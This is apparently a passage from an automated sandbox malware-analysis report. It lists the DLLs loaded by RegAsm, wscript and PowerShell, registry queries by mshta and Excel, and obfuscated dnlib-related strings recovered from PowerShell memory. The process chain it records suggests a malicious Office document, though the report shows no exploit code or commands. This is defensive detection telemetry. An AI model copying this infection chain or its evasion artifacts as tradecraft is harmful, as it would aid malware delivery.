                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sknmngfy\sknmngfy.pdbhP\ source: powershell.exe, 00000005.00000002.450249616.00000000038A6000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001E.00000002.524728452.000000001295E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.535276986.000007FE89C60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.535388004.000007FE89C40000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D060000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000001E.00000002.524728452.000000001295E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.529986133.000000001CE00000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.481760106.000000001260D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.526571067.000000001D029000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: hunkIHeapIMetaDataListenerDummyMetaDataListenerMetaDataEventIModuleWriterListenerDummyModuleWriterListenerModuleWriterEventIOffsetHeap`1IWriterErrorCor20HeaderOptionsImageCor20HeaderImportAddressTableImportDirectoryIMDTableMDTable`1<GetRawRows>d__31MDTableWriterMarshalBlobWriterMaxStackCalculatorMetaDataFlagsMetaDataOptionsMetaDatak2nmAi42SiU6tG7RohOq`2gT5xFA425EjqLRUbluTfB8M9U442fHfvCwWJTRuG`1MetaDataHeaderOptionsMetaDataHeaderMethodBodyMethodBodyChunksITokenCreatorMethodBodyWriterMethodBodyWriterBaseModuleWriterOptionsModuleWriterModuleWriterOptionsBaseCreatePdbSymbolWriterDelegateModuleWriterBaseModuleWriterExceptionNativeModuleWriterOptionsNativeModuleWriterOrigSection<GetSectionSizeInfos>d__59NetResourcesnXZDoh4F5VkwYDGidXAePf5Fgg4FiHZ1nM3bJq4jPEHeadersOptionsPEHeaders<GetSectionSizeInfos>d__61PESectionS9nLmq4Kc7SiWyjGbN1tpL7Hc44K8tmypZbOcZNgwWGsMK4Wix4eJl5yKKA2`1eTgauU4WKEU9eI8KNWBN`1<>c__DisplayClass30_0RelocDirectoryO2gyxB4x5FODyAyFxIYuMY71kl4xinw8E0XtGINGR6IG2W4x9imEEkr7jZIpu5qc2R4xK6a5MlmnlSqHISignatureWriterHelperSignatureWriterStartupStubStringsHeapStrongNameSignatureTablesHeapOptionsTablesHeapUSHeap<GetAllRawData>d__17UniqueChunkList`1Win32ResourcesChunkhqyuh84Tkmlqq6o6Nnk4gnvTau4TG7dlLot4qU6GBuiltInResourceDatadnlib.DotNet.ResourcesIResourceDataResourceDataCreatorbk7KjU4ZisbNU4Zo0ogNSerializationBinderSystem.Runtime.SerializationAVbMcb4ZFBlPaZdQlXAWResourceElementResourceElementSetResourceReaderExceptionCreateResourceDataDelegateResourceReaderXlS2tx4V9ICaFZXd4M3kResourceTypeCodeResourceWriterUserResourceDataBinaryResourceDataUserResourceTypeIMAGE_DEBUG_DIRECTORYdnlib.DotNet.PdbISymbolWriter2PdbDocumentPdbImplTypePdbScopePdbStatezwWAHs4MAMX6GvB6CgvlPdbWriterzXqFUX4JWZjrcmy4ceTT<GetScopes>d__17SequencePointSymbolReaderCreatorSymbolWriterCreatorIMetaDataDispenserdnlib.DotNet.Pdb.DssISymUnmanagedBinderISymUnmanagedReaderISymUnmanagedDocumentISymUnmanagedMethodISymUnmanagedVariableISymUnmanagedNamespaceISymUnmanagedScopeIMetaDataImportIMetaDataEmitISymUnmanagedWriterISymUnmanagedWriter2ISymUnmanagedDocumentWriters3AFAe4lX1c5L15ssGaKgSnlGD4lLsoAn7qHm2GmY8NgBr4lK0BweLrZnNgPl8RLGl4lfdXabYWoKDxYUq8QQI4lWJrCiqYasAjWhpPGVE4lxMvDaQyEb9pLtR26Ex4lYvQp6R9Km4RyeIIVX64lvt2uCTyCMV7qAdbfRr4ljLgOYFe6USGnsVFehp4tuu3uWVuXJoVvoB8bqG4ta40Rc7sfoP6VsGmK2F4t9WUay6TuKYEoUMSKlF4tKtFtNxWPetumsp3EEq4tfSeo3d26PuoGc7DArj4tWLdQJhFDqkUYY8TjB34txspg6vFEEVmZDOictU4tOGbaP6sXqraWQpQOUk4tM7rjkQLr8Z5JpAUt524thMKV9nkg6FJATrZoW84trN80DUPJqpNiMrNGaR4tjf7WIhsTlKYUbQSJnb4twUHesxC7oQ58jAaUyg4AUA3lUeloVHTMdQVnW84ABSj0XTxemlrQNtB38a4AfOHPtD2mZqgvHSLYEp4AWFB